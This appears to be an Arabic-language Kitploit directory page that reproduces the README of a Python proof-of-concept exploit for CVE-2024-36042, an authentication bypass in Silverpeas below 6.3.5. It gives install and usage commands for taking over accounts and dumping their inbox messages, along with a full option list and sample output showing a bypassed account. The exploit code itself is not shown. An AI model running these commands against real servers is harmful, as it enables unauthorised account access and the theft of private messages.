Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — PoC بلغة بايثون لثغرة تجاوز المصادقة CVE-2024-36042 في Silverpeas < 6.3.5. تشمل الميزات كشف الإصدار، تعداد المستخدمين متعدد الخيوط، استخراج الرسائل، وإعداد تقارير منظمة لاختبارات الأمان المصرح بها. | Kitploit
أدوات/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
المصادقة والترخيصالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

PoC بلغة بايثون لثغرة تجاوز المصادقة CVE-2024-36042 في Silverpeas < 6.3.5. تشمل الميزات كشف الإصدار، تعداد المستخدمين متعدد الخيوط، استخراج الرسائل، وإعداد تقارير منظمة لاختبارات الأمان المصرح بها.

عرض المستودع
5منذ 3 أشهرلم تتم المراجعة بعد

Silverpeas-AuthBypass-CVE-2024-36042

نص برهان مفهوم (PoC) نظيف واحترافي بلغة Python3 لثغرة CVE-2024-36042 — وهي تجاوز للمصادقة في Silverpeas < 6.3.5 ناتج عن غياب التحقق من كلمة المرور في AuthenticationServlet.

Python 3.8+ License: MIT


نظرة عامة

يستقبل Silverpeas AuthenticationServlet طلب تسجيل الدخول حتى عندما يكون معامل Password محذوفًا من جسم طلب POST، مما يمنح وصولًا بجلسة مصادقة إلى أي اسم مستخدم معروف. تعرض هذه الأداة الثغرة بمسؤولية من خلال إطار استغلال معياري متعدد الخيوط مزود باكتشاف متقدم، واستخراج بيانات، وإنشاء تقارير احترافية.

المتأثر: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


الميزات


التثبيت

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

الاستخدام

اختبار سريع (قائمة مستخدمين مدمجة)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

تقارير متقدمة (Markdown + Console)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

تصدير جنائي (ملفات فردية لكل رسالة)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

فحص الإصدار فقط (بدون استغلال)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

عبر وكيل مع تسجيل HTML الخام

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

إدارة المخرجات

تدعم الأداة أربعة أوضاع مخرجات أساسية للرسائل المفرّغة عبر --message-output:

  1. console (الافتراضي): يطبع الرسائل المنظفة مباشرة إلى الطرفية مع تمييز الكلمات المفتاحية.
  2. markdown: ينشئ تقريرًا واحدًا {username}_messages.md لكل حساب في دليل المخرجات.
  3. files: ينشئ مجلدًا لكل حساب ويحفظ كل رسالة كملف فردي (مثل message_0006.md) بمعرّفات مبطّنة بالأصفار لترتيب نظيف في نظام الملفات.
  4. both: يجمع بين وضعي console و markdown.

هيكل المخرجات

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (optional: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

مرجع سطر الأوامر

root@kitploit:~
-t, --target        Base URL of Silverpeas (required)
-u, --user          Single username to target
--userlist          File with one username per line
--dump-messages     Scrape and display inbox messages
--max-id            Max message ID to check (default: 50)
--threads           Concurrent workers (default: 5)
--proxy             HTTP proxy URL
--message-output    Output mode: {console, markdown, files, both}
--output-format     File format: {md, txt}
--json              Export full JSON report
--csv               Export CSV of scraped messages
--outdir            Output directory for exports
--no-color          Disable ANSI color output (useful for logs)
--save-raw-html     Save original HTML responses for debugging
--check-version     Fingerprint version only
--no-exploit        Skip exploitation (pair with --check-version)
--quiet, -q         Minimal output
--no-banner         Suppress banner

مثال على المخرجات

root@kitploit:~
[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.

[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account       │ Status   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCESS  │ 6        │
│ admin         │ FAILED   │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON report -> ./report_20260516_013210.json

لماذا هذا المستودع؟

هذا المستودع جزء من ملف أعمالي في مجال الأمن الهجومي. وهو يوضح:

  • ترجمة البحث في الثغرات — تحويل CVE معلن إلى استغلال عملي وموثوق.
  • أدوات عالية الجودة — معالجة قوية للأخطاء، ودعم متعدد اللغات، وإدارة منظمة للمخرجات.
  • الوعي التشغيلي — تعدد الخيوط، ودعم الوكيل، ومنطق إزالة التكرار للبيئات الواقعية.
  • هندسة احترافية — بنية كود نظيفة، وتوثيق شامل، وتركيز على تجربة المشغّل (UX).

إخلاء مسؤولية

هذه الأداة مُقدَّمة لأغراض اختبار الأمان المصرح به والبحث والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن صريح قبل اختبار أي بنية تحتية لا تملكها.


الترخيص

MIT

تنزيل الأداة
الميزةالوصف
اكتشاف الإصدارتحديد إصدار Silverpeas وحالة الثغرة قبل الاستغلال.
متعدد الخيوطتعداد متزامن للمستخدمين عبر ThreadPoolExecutor مع مخرجات آمنة للخيوط.
اكتشاف متقدماكتشاف نقاط النهاية متعدد اللغات (الإنجليزية/الفرنسية) مع فحص متعدد المعرّفات.
استخراج البياناتتفريغ رسائل عالي الدقة مع إزالة التكرار وتصفية القوالب النمطية.
مخرجات مرنةدعم لوحدة التحكم وتقارير Markdown وتصدير ملفات فردية (.md أو .txt).
الوكيل والتنقيحالتوجيه عبر Burp/ZAP (--proxy) وحفظ HTML الخام لتنقيح المحلل اللغوي.
تجربة استخدام نظيفةجداول ملخص ASCII، وتمييز الكلمات المفتاحية، والتحكم الاختياري بألوان ANSI.